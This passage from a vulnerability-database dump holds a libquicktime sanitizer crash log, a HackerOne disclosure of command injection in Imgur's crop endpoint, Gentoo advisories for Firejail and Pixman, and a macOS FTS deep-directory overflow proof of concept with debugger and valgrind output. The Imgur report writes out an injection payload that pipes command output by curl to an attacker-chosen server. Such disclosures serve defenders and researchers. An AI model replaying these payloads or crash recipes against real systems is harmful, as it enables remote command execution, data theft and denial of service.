fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n\r\n\r\n\r\n\r\n=================================\r\n\r\n\r\nqflb.wu () dbappsecurity com cn\r\n\r\n\r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42148/"}], "hackerone": [{"lastseen": "2018-04-19T17:34:08", "bulletinFamily": "bugbounty", "bounty": 5000.0, "description": "### Summary\n\nThe `y` parameter of `/edit/process` endpoint (with `a=crop`) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably `gm convert`). Due to GraphicsMagick's hacker-friendly processing of `|`-starting filenames supplied to `-write` option, it leads to command execution.\n\n### Reproduction steps\n\n0. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.\n1. Login into your imgur account and upload an image.\n2. Move your mouse over the image, click on the tiny button with pencil on it, then click \"Edit\".\n3. Select a random rectangle on the image, then click \"Apply\".\n4. In the burp suite, you will see a request to an URL like this: `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0&w=700&h=746&random=4011802027746510`\n\n Change the `y` parameter of the request so it becomes `0 -write |ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-`. \n\n The full URL after the change must look like `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0%20-write%20|ps${IFS}aux|curl${IFS}http://<your-server>{IFS}-d${IFS}@-&w=700&h=830&random=9905392865702303`, note that you have to change `<your-server>` to a webserver under your control).\n\n5. Fire a request to the modified URL. The command (`ps aux|curl http://<your-server> -d @-`) will be executed somewhere inside imgur, and you will get a HTTP request to `<your-server>` with the result of `ps aux` in the POST body. You can replace `ps aux` with another command (but you have to write `${IFS}` instead of spaces).\n\n### Detailed description\n\nI was searching for CVE-2016-10033-like vulnerabilities on several bugbounty sites when I noticed strange behaviour of the mentioned parameter. The vulnerability exists because the user input (the contents of `y` GET parameter) goes into a shell command. While all special characters (like `|`, `$` and so on) seem to be escaped, the space character is not. This allows the attacker to insert additinal command line arguments. The common reason for such behaviour is `escapeshellcmd` PHP function, but that can also be some kind of custom input filtering/processing.\n\nThe rest of the exploitation depends on the program that is executed (we need to find out if it supports any dangerous command-line options). Common sense suggests that the external command launched by \"Crop/Resize\" function must be some image processing tool. The most popular one is ImageMagick/GraphicsMagick, so I appended ` -rotate 90` to the parameter and it succeded --- I saw lying Trump (I mean, the image was rotated). After more tries I was sure it's GraphicsMagick (probably `gm convert` utility). I read the documentation and found that `-write` argument supports perl-style filenames starting with a pipe --- in this case the rest of the filename must be a command to execute.\n\n### Mitigation\n\nProbably either some kind of custom processing or `escapeshellcmd` function is used to construct the command line. In both cases, replace it with applying `escapeshellarg` to individual arguments. In the second case, you probably want to run `grep -R escapeshellcmd <path to the source code>` to find more vulns :-)\n", "modified": "2017-04-26T21:30:28", "published": "2017-03-12T03:46:46", "id": "H1:212696", "href": "https://hackerone.com/reports/212696", "type": "hackerone", "title": "Imgur: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2016-12-30T10:13:33", "bulletinFamily": "unix", "description": "### Background\n\nA SUID program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces and seccomp-bpf. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Firejail. Please review upstream\u2019s release notes below for details. \n\n### Impact\n\nA remote attacker could possibly bypass sandbox protection, cause a Denial of Service condition, or change a system\u2019s DNS server. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Firejail users should switch to the newly added LTS version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/firejail-lts-0.9.38.6\"\n \n\nUsers who want to stay on the current branch should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/firejail-0.9.44.2\"", "modified": "2016-12-27T00:00:00", "published": "2016-12-27T00:00:00", "id": "GLSA-201612-48", "href": "https://security.gentoo.org/glsa/201612-48", "type": "gentoo", "title": "Firejail: Multiple vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-13T09:58:27", "bulletinFamily": "unix", "description": "### Background\n\nPixman is a pixel manipulation library.\n\n### Description\n\nIn pixman-general, careless computations done with the \u2018dest_buffer\u2019 pointer may overflow, failing the buffer upper limit check. \n\n### Impact\n\nA remote attacker could possibly cause a Denial of Service condition, or execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Pixman users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/pixman-0.32.8\"", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://security.gentoo.org/glsa/201612-37", "id": "GLSA-201612-37", "title": "Pixman: Buffer overflow", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:58", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "href": "https://packetstormsecurity.com/files/134710/Mac-OS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134710", "type": "packetstorm", "title": "Mac OS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- MACOS's Commands such as: ls, find, rm \n- iPhone 4s and later, \n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes \n- Apple TV (4th generation) \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n... \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n... \n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n... \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n... \n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. \n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . -name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n... \n \nInvalid memory write without crashing. \n \n \nBTW: \nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. \n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134710/WLB-2015100149.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:22", "bulletinFamily": "exploit", "description": "", "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/134090/MacOS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134090", "type": "packetstorm", "title": "MacOS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- Commands such as: ls, find, rm \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n.. \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n.. \n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 